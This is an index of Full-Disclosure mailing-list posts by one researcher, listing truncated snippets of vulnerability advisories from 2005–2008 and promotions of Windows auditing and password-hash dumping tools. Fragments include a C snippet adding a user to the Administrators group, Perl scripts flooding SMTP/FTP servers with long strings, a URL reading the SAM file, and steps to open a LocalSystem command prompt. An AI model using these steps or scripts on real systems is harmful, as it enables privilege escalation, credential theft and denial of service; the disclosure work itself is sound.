[Full-disclosure] Last day to download WinScanX Basic or WinScanX Pro... forever.

2010-03-11 Thread Reed Arvin
I have received a cease and desist letter regarding certain tools on http://windowsaudit.com. Regardless of the validity of the accusations, I do not have the financial means to support legal defense. With that said, please take this opportunity to download WinScanX Basic or purchase WinScanX Pro

[Full-disclosure] Get WinScanX Pro for FREE or $10 dollars for the month of February (only 5 days left!)

2010-02-23 Thread Reed Arvin
ONLY 5 days left! In an effort to spread the word about WinScanX Pro, one of the best Windows auditing tools around, substantial discounts are being offered for the month of February. = Buy WinScanX Pro for just $10.00 (normally priced at $250.00) WinScanX Pro can

[Full-disclosure] Finding Domain Controllers for use with WinScanX using DCLookup.exe (source included)

2010-02-09 Thread Reed Arvin
WinScanX Pro is only $10.00 for the month of February (normally $250.00) WinScanX Basic (always free - only scans one host per run) http://www.windowsaudit.com/ Article tool: DCLookup.exe (source included) http://windowsaudit.com/downloads/DCLookup.zip Original article link:

[Full-disclosure] Creating An IP Input File for WinScanX

2010-02-03 Thread Reed Arvin
For those of you that are using WinScanX Pro, you may find the need to create an IP input file at some point so you can cover a large range of hosts very quickly. The following script can help you to do just that. http://windowsaudit.com/downloads/CreateIPInputFile.zip Usage: - Unzip the

[Full-disclosure] Get WinScanX Pro for FREE or $10 dollars for the month of February

2010-02-02 Thread Reed Arvin
In an effort to spread the word about WinScanX Pro, one of the best Windows auditing tools around, substantial discounts are being offered for the month of February. = Buy WinScanX Pro for just $10.00 (normally priced at $250.00) WinScanX Pro can potentially scan

[Full-disclosure] Windows Account Password Guessing with WinScanX

2010-01-04 Thread Reed Arvin
Original article: http://windowsaudit.com/winscanx/windows-account-password-guessing-with-winscanx/ WinScanX download (free): http://windowsaudit.com/ Watch the video: http://www.youtube.com/watch?v=i9ZI7A-IpDw One of the most dangerous things you can do with WinScanX is lockout a Windows account

[Full-disclosure] WinScanX - The safest way to retrieve Windows password hashes, LSA secrets, etc.

2009-12-27 Thread Reed Arvin
Using WinScanX to retrieve Windows password hashes, LSA secrets and MS CACHE hashes without copying a single file to the remote host. Read on... Video and WinScanX (free) download link at: http://windowsaudit.com/winscanx/retrieving-password-hashes-with-winscanx-y/ Retrieving password hashes,

[Full-disclosure] WinScanX - A free Windows enumeration tool and a must have for any security professional

2009-12-23 Thread Reed Arvin
WinScanX was released today. A Windows command-line enumeration tool plus an optional GUI front-end. A must have for any security professional. Download link: http://windowsaudit.com/downloads/WinScanX_Basic.zip Web site: http://www.windowsaudit.com/ Features and usage information: WinScanX

[Full-disclosure] WinScanX - A free Windows enumeration tool and a must have for any security professional

2009-12-22 Thread Reed Arvin
WinScanX was released today. A Windows command-line enumeration tool plus an optional GUI front-end. A must have for any security professional. Download link: http://windowsaudit.com/downloads/WinScanX_Basic.zip Web site: http://www.windowsaudit.com/ Features and usage information: WinScanX

[Full-disclosure] PWDumpX v1.4 - Dumps domain password cache, LSA secrets, password hashes, and password history hashes.

2008-01-07 Thread Reed Arvin
.zip Source code included. Tool homepage: http://reedarvin.thearvins.com/tools.html Thank you, Reed Arvin reedarvin_at_gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored

[Full-disclosure] PWDumpX v1.0 and PWDumpX v1.1 updated - bug fixes

2008-01-07 Thread Reed Arvin
Source code included with both tools. Thank you, Reed Arvin reedarvin_at_gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] New Windows tool - PWDumpX v1.1 (with CacheDump functionality)

2006-12-21 Thread Reed Arvin
://reedarvin.thearvins.com/tools.html Written by Reed Arvin [EMAIL PROTECTED]. Thank you, Reed Arvin [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http

[Full-disclosure] New Windows tool - PWDumpX v1.0

2006-11-28 Thread Reed Arvin
for PWDump2, PWDump3e, and LSADump2. So...thanks to the creators of these tools for being generous enough to include the source code with these tools so that hungry minds can learn new things. = Tool homepage: http://reedarvin.thearvins.com/tools.html Written by Reed Arvin [EMAIL PROTECTED]. Thank

[Full-disclosure] New Windows tool - NBTEnum 3.3

2006-11-25 Thread Reed Arvin
routine. Included source code for educational purposes. = Tool homepage: http://reedarvin.thearvins.com/tools.html Written by the current and original author, Reed Arvin [EMAIL PROTECTED] . [EMAIL PROTECTED] (deprecated) [EMAIL PROTECTED] (deprecated) [EMAIL PROTECTED] (current and final

[Full-disclosure] %5BFull-disclosure%5D%2018%20ways%20to%20escalate%20privileges%20in%20Zone%20Labs%0A%09ZoneAlarm%20Security%20Suite%20build%206.1.744.000In-Reply-To=

2006-03-08 Thread Reed Arvin
It appears that some of the characters in the previous post were not HTML safe. The original article can be found at: a href=http://reedarvin.thearvins.com/20060308-01.html;http://reedarvin.thearvins.com/20060308-01.html/a ___ Full-Disclosure - We

Re: [Full-disclosure] Privilege escalation in McAfee VirusScanEnterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

2005-12-23 Thread Reed Arvin
for years. Sorry you wasted your time. It's clear you were unaware of the previous research. You must have thought it was pretty important, considering how many lists you cross posted to. Thanks for your efforts. Reed Arvin [EMAIL PROTECTED] wrote: Sir, On Windows 2000 operating systems

[Full-disclosure] Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

2005-12-22 Thread Reed Arvin
); system( szCmdLine ); printf( Adding user \Program\ to the local Administrators group...\n ); wsprintf( szCmdLine, %s\\system32\\net.exe localgroup Administrators Program /add, szWinDir ); system( szCmdLine ); return 0;}// = End Program.c ==Discovered by Reed Arvin reedarvin[at]gmail[dot]com

Re: [Full-disclosure] Privilege escalation in McAfee VirusScanEnterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

2005-12-22 Thread Reed Arvin
Sir, On Windows 2000 operating systems the default permissions for the root of the OS drive is Everyone/Full Control. However, with Microsoft operating systems newer than Windows 2000 administrative privileges are necessary. Thank you for your comment. Regards, Reed On 12/22/05, Steven Rakick

[Full-disclosure] Privilege escalation in Network Associates ePolicy Orchestrator Agent 3.5.0 (patch 3)

2005-08-11 Thread Reed Arvin
file such as: http://127.0.0.1:8081/Test/WINDOWS/repair/sam The contents of the restricted file will be displayed thanks to the LocalSystem account. Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) ___ Full

[Full-disclosure] Privilege escalation in Linksys WLAN Monitor v2.0.

2005-08-10 Thread Reed Arvin
of the LocalSystem account). Click File, click Open. 8. Change Files of type: to All Files, navigate to the system32 directory and locate cmd.exe. Right click cmd.exe and choose Open. The result is a command prompt running under the context of the LocalSystem account. Discovered by Reed Arvin reedarvin

[Full-disclosure] Buffer overflow in BusinessMail email server system 4.60.00

2005-08-01 Thread Reed Arvin
); print $socket HELO . A x 512 . \r\n; sleep(1); print $socket MAIL FROM: . A x 512 . \r\n; close($socket); } else { print Cannot connect to $ARGV[0]:25\n; } #= Start BusMail_SMTPDOS.pl = Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http

[Full-disclosure] Denial of service vulnerability in FTPshell Server Version 3.38

2005-07-26 Thread Reed Arvin
); close($socket); } else { print Cannot connect to $ARGV[0]:21\n; } } #= Start FTPShell_FTPDOS.pl = Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) Vulnerability discovered using PeachFuzz (http

[Full-disclosure] Multiple buffer overflows exist in Infradig Systems Inframail Advantage Server Edition 6.0

2005-06-28 Thread Reed Arvin
102400 . \r\n; close($socket); } else { print Cannot connect to $ARGV[0]:21\n; } #= End Inframail_FTPOverflow.pl = Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) Vulnerability discovered using PeachFuzz (http://reedarvin.thearvins.com

[Full-disclosure] Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051.

2005-06-27 Thread Reed Arvin
connect to $ARGV[0]:143\n; } #= End IAeMailServer_DOS.pl = Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) Vulnerability discovered using PeachFuzz (http://reedarvin.thearvins.com/tools.html) ___ Full-Disclosure

[Full-disclosure] Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)

2005-04-27 Thread Reed Arvin
; close($socket); } else { print Cannot connect to $ARGV[0]:21\n; } #= End GoldenFTPServer_Overflow.pl = Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com) ___ Full-Disclosure - We believe in it. Charter

[Full-disclosure] Privilege escalation in BulletProof FTP Server v2.4.0.31

2005-04-27 Thread Reed Arvin
of the LocalSystem account. Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Privilege escalation and password protection bypass in Altiris Client Service for Windows (Version 6.0.88)

2005-04-27 Thread Reed Arvin
directory and locate cmd.exe. Right click cmd.exe and choose Open. The result is a command prompt running under the context of the LocalSystem account. Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com) ___ Full-Disclosure - We

[Full-disclosure] Privilege escalation in BakBone NetVault 7.1

2005-04-27 Thread Reed Arvin
of type: to All Files, navigate to the system32 directory and locate cmd.exe. Right click cmd.exe and choose Open. The result is a command prompt running under the context of the LocalSystem account. Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com) Assistance